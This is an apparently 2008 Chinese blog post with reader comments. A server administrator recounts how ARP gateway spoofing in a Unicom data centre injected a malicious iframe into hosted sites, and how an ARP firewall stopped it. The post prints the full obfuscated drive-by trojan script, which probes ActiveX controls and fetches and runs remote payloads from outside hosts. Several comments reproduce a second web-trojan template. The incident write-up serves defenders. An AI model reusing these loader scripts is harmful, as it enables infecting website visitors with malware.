百度首页 | 百度空间
 
查看文章
  
辽宁联通机房网关被jtxp劫持
2008-03-10 06:28

从昨天下午开始,位于辽宁联通的部分服务器上的所有站点对WEB的请求都被强行加上一个iframe,网友访问这些站点时,获得的html源代码的顶端都会有以下一行代码。

<iframe src="http://www.jtxp.net/mm/p682.htm" width="100" height="0"></iframe>                                                                                                  
这一代码中有木马,对访问者非常不利!

其最终的木马执行代码可以追溯到http://www.jtxp.net/hi.htm(代码见最后面)等页面。

昨天晚上刚遇到这一问题时,

我初步认为可能有两种情况:

1.站点源文件被改;

2.IIS被修改

我首先看了站点的源文件,发现并未被篡改;我转而查看IIS相关配置并到追踪这一问题未果,再到C:\WINDOWS\system32\inetsrv\MetaBase.xml中查找jtxp相关信息,也没有。我再检查了服务器有没有可疑的服务程序和进程,也没有。再对端口和系统帐号进行了检查,还是没有问题。我已经完全没有思路和办法了。在服务器的安全上第一次感到了如此的无力和无助。在网上也没有找到可供参考的相关解决办法。晚上解决未果。入睡时我想,难道是网通的ASDL路由(我上网的线路是网通的)被劫持强行加上这一数据了?

早上早早起来。从5:30开始,再次对服务器进行全面检查。还是没有问题。6:00的时候,我发现另一台服务器也出现类似问题。从而开始怀疑机房。后来一检查,发现果然是联通机房局域网内有网关欺骗。并通过网关欺骗劫持了网内服务器的WEB请求数据包,加上以上代码。确查攻击源的MAC为:00-1C-F0-0D-23-CD

服务器上安装ARP防火墙后即可解决这一个问题。不过要从根源上解决,还需要联通机房的加强管理。

通过这种方式来传播病毒,的确很可怕。

<script>window.onerror=function(){return true;}</script>
<SCRIPT LANGUAGE="JavaScript">
if(document.cookie.indexOf('OK')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("\x63\x6c\x61\x73\x73\x69\x64","\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");var as=ado.createobject("\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();if(e!="[object Error]"){document.write('<iframe style=display:none src="http://www.52gol.com/ms.htm"></iframe>')}else{try{var f;var storm=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(f){};finally{if(f!="[object Error]"){document.write('<iframe style=display:none src="http://www.52gol.com/real.htm"></iframe>')}}try{var h;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(h){};finally{if(h!="[object Error]"){document.write('<iframe style=display:none src="http://www.52gol.com/ms1.htm"></iframe>')}}try{var k;var Fuck=new ActiveXObject("BaiduBar.Tool")}catch(k){};finally{if(k!="[object Error]"){Fuck["\x44\x6c\x6f\x61\x64\x44\x53"]("http://www.52gol.com/baidu.cab","\x42\x61\x69\x64\x75\x2e\x65\x78\x65",0)}}if(f=="[object Error]"&&h=="[object Error]"&&k=="[object Error]"){location.replace("about:blank")}}}}
</SCRIPT>

其中的JS脚本都使用了unicode或是16进制的编码。iframe的页面也很多。早上就要出去了,有时间的时候,再解码吧。


类别:事业 | 添加到搜藏 | 浏览() | 评论 (9)
 
最近读者:
 
网友评论:
1
2008-03-10 15:00
局域网内网关欺骗,这种木马前几月在我们公司的局域网内也多次出现,表现症状是受侵机器网关被攻击盗用,只能手动不断修改刷新IP地址才能上网,或者下载一个很小的ANTIARP就拦截了.没想到联通的机房也会被出现这种问题,不安全.
 
2
2008-03-11 11:20
h同学的回复很专业!这几年这方面也进步不小。值得表扬啊。
 
3
2008-03-19 21:20
刚查了下http://www.jtxp.net/mm/p682.htm指向:http://www.jtxp.net/vip.html
该网马源码:
<Html>

<Body>

<noscript>

<iframe src=*></iframe>

</noscript>

<script language="javaScript">

function init(){document.write();}

window.onload = init;

if(document.cookie.indexOf('Cuteqqsx')==-1){

var ids="clsid:BD9";

var idss="6C556-65A3-11D";

var idsss="0-983A-00C04FC29E36";

 
4
2008-03-19 21:20
var idx=ids+idss+idsss;

try{

var e;

var ado=(document["createElement"]("object"));

ado["setAttribute"]("classid",idx);

var as=window["ado"]["createobject"]("A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m","")}

catch(e){};

finally{

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie='Cuteqqsx=qq784378237s;path=/;expires='+expires.toGMTString();
 
5
2008-03-19 21:20
if(e!="[object Error]"){

document.write("<iframe width='0' height='0' src='http://www.jtxp.net/ms.htm'></iframe>")}

else{

try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");}

catch(r){};

finally{if(r!="[object Error]"){

document.write("<iframe width='5' height='5' src='http://www.jtxp.net/real.htm'></iframe>")}}

try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");}

catch(g){};

finally{if(g!="[object Error]"){

document.write("<iframe width='5' height='5' src='http://请输入您网马的存放地址/Bfyy.htm'></iframe>")}}

 
6
2008-03-19 21:21
try{var i;var thunder=new window["ActiveXObject"]("DPClient.Vod");}

catch(i){};

finally{if(i!="[object Error]"){

document.write("<iframe width='10' height='10' src='http://请输入您网马的存放地址/XunLei.htm'></iframe>")}}

try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1");}

catch(j){};

finally{if(j!="[object Error]"){

document.write("<iframe width='5' height='5' src='http://www.jtxp.net/ms1.htm'></iframe>")}

if(r=="[object Error]"&&g=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){

document.write("<iframe width='0' height='0' src='http://请输入您网马的存放地址/QVod.htm'></iframe>")}}

}}}

</script>

</Body>

</Html>
 
7
2008-03-26 17:51
为什么我看网站,一下跳到这个网站,?
 
8
2008-03-27 19:40
我也是 为什么啊
 
9
2008-03-27 21:25
7楼8楼,你们的局域网可能有ARP病毒.联系你们的网管解决下.
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码:
 

     

©2008 Baidu